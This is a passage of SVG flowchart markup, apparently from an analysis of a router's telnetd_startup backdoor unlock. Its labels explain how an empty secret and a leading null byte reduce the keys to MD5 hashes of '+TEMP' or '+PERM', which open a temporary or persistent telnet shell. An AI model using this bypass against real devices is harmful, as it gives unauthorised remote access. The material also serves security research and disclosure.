x="976.940143610014" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1024.0401420841351" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1030.3901419887677" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1227.0734763393536" y="1676.230603859" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with the first 31 bytes</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1697.592023559" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1002.5568104038373" y="1697.592023559" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1240.5234699497357" y="1697.592023559" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store the result in</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1718.9534432589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1149.7734718570844" y="1718.9534432589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 948.4582506766808 1727.498011139 L 1033.9039294766808 1727.498011139 L 1033.9039294766808 1755.267856749 L 966.0458195630141 1755.267856749" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(948.4582506766808,1755.267856749) translate(-948.4582506766808,-1755.267856749)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 966.2594337600141 1746.3672652073333 L 948.4582506766808 1755.267856749 L 966.2594337600141 1764.1684482906667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1787.309986299" width="450.4417511053125" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1808.671405999" width="475.2084289617578" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1830.0328256989999" width="375.8917571134607" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1851.3942453989998" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1872.7556650989998" width="457.04175720882813" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="130.8083703657728" y="1894.1170847989997" width="157.77508841228882" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1806.535264029" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">We no longer need to be able to decrypt the</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1827.896683729" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="387.1792550737025" y="1827.896683729" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and so we no longer</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1849.258103429" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">have any need of the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="353.6792550737025" y="1849.258103429" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PRIVATE KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="497.14591461960094" y="1849.258103429" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1870.6195231289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="134.0125833207728" y="1891.9809428289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">We can simply set </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.34591156784313" y="1891.9809428289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="519.0292459184291" y="1891.9809428289998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to the</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="134.0125833207728" y="1913.3423625289997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">empty string</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="279.02924591842907" y="1913.3423625289997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 94.84998053743945 1921.8869304090001 L 190.97636918743945 1921.8869304090001 L 190.97636918743945 1949.656776019 L 123.1182592737728 1949.656776019" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(105.53069038743945,1949.656776019) translate(-105.53069038743945,-1949.656776019)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 123.33187347077279 1940.7561844773334 L 105.53069038743945 1949.656776019 L 123.33187347077279 1958.5573675606668 Z"/></g></g><g><g><rect fill="white" stroke="none" x="984.416640505014" y="1981.6989055690003" width="340.0250946111719" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2003.0603252690003" width="627.508409125332" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2024.4217449690002" width="586.8917456693689" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2045.7831646690001" width="137.67508850765626" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2067.1445843690003" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2088.5060040690005" width="589.0584198064844" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2109.8674237690007" width="620.708417517666" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2131.228843469001" width="509.0584150381128" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2000.9241832990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Create two new strings by calling</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1072.1875191094282" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1229.7708473564985" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1251.6708469750288" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1283.604179418266" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1354.5208435418012" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1376.4208431603315" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1549.2541714074018" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1558.3875046135786" y="2022.2856029990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1072.1875191094282" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1231.4541817070844" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1253.3541813256147" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1285.287513768852" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1357.8875122429731" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1379.7875118615034" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1552.6208401085737" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1561.7541733147505" y="2043.6470226990002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2065.008442399" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively. </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2086.3698620990003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2107.7312817990005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Note that if </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1124.5375252129438" y="2107.7312817990005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1297.3708534600141" y="2107.7312817990005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> begins with a null byte,</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">then the strings </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1176.1208534600141" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1333.7041817070844" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and  </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1396.654182470024" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1555.9208450676801" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> will</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">just be </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1071.987522161186" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"+TEMP"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1171.4375191094282" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1178.404185807884" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1220.4541850449446" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1227.4208517434004" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"+PERM"</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1328.6208486916425" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, respectively!</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 948.4582506766808 2158.998689079 L 1044.5846393266806 2158.998689079 L 1044.5846393266806 2186.7685346890003 L 976.7265294130141 2186.7685346890003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(959.1389605266808,2186.7685346890003) translate(-959.1389605266808,-2186.7685346890003)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 976.940143610014 2177.867943147334 L 959.1389605266808 2186.7685346890003 L 976.940143610014 2195.6691262306667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="984.416640505014" y="2218.8106642390003" width="669.8250824041406" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2240.1720839390005" width="595.1917487211267" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2261.5335036390006" width="131.32509003353516" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1124.3708534600141" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1174.7875213982466" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hashes of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1283.8541870476606" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1441.437515294731" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1491.7708473564985" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the 16-byte results as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1313.7708473564985" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1415.9041786553266" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1466.2375107170942" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1570.0541763665083" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2280.7587813690006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 959.1389605266808 2289.303349249 L 1044.5846393266806 2289.303349249 L 1044.5846393266806 2317.073194859 L 976.7265294130141 2317.073194859" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(959.1389605266808,2317.073194859) translate(-959.1389605266808,-2317.073194859)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 976.940143610014 2308.1726033173336 L 959.1389605266808 2317.073194859 L 976.940143610014 2325.9737864006665 Z"/></g></g><g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2349.115324409" width="496.85843811703126" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2370.4767441090003" width="318.9750948972742" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2391.8381638090004" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2413.1995835090006" width="488.59174881649415" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2434.561003209001" width="370.7084327764551" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2455.922422909001" width="489.37509117794434" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2477.283842609001" width="529.9750991888086" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2498.6452623090013" width="527.6250778265039" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2520.0066820090015" width="138.64176331234376" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2541.3681017090016" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2562.729521409002" width="558.4251075811426" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2584.090941109002" width="540.40842591" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2605.452360809002" width="72.47509155941407" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2626.8137805090023" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2648.1752002090025" width="292.0917616910974" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2368.340602139" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">The Client is now expected to append one of two</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2389.7020218390003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">suffixes to </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="253.8432946966517" y="2389.7020218390003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="450.52662904723763" y="2389.7020218390003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">:</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2411.0634415390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">- "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="167.4599595831263" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="238.37662370666146" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to launch a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="378.5099550054896" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="460.17661912902474" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> session that will</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2453.786280939001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   last until the router is rebooted, </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="italic" font-weight="normal" text-decoration="normal" x="488.5432992742884" y="2453.786280939001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">or</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2475.147700639001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">-  "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="173.80995996459603" y="2475.147700639001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="246.40995843871713" y="2475.147700639001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to write a flag to a physical volume,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2496.509120339001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   which the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="267.5432916448939" y="2496.509120339001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="442.15996034606576" y="2496.509120339001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon will check for</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2517.8705400390013" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   when the system is rebooted, and launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="584.2432809637415" y="2517.8705400390013" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2539.2319597390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   if it finds it.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2560.5933794390016" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.6932931707728" y="2581.954799139002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Remember that we have set </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="469.7599740789759" y="2581.954799139002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="666.4433084295619" y="2581.954799139002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.6932931707728" y="2603.316218839002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">the empty string, so the suffix is all we need to</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.6932931707728" y="2624.677638539002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">know.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2646.0390582390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2667.4004779390025" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="330.6099649237025" y="2667.4004779390025" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="424.02662904723763" y="2667.4004779390025" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 105.53069038743945 2675.945045819 L 201.65707903743944 2675.945045819 L 201.65707903743944 2703.714891429 L 133.7989691237728 2703.714891429" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(116.21140023743945,2703.714891429) translate(-116.21140023743945,-2703.714891429)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 134.0125833207728 2694.8142998873336 L 116.21140023743945 2703.714891429 L 134.0125833207728 2712.6154829706666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2735.757020979" width="480.60842667293946" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2757.1184406790003" width="302.35841665935914" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2778.4798603790005" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2799.8412800790006" width="501.35843811703126" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2821.202699779001" width="293.15842591" height="27.769845609999997"/></g><text 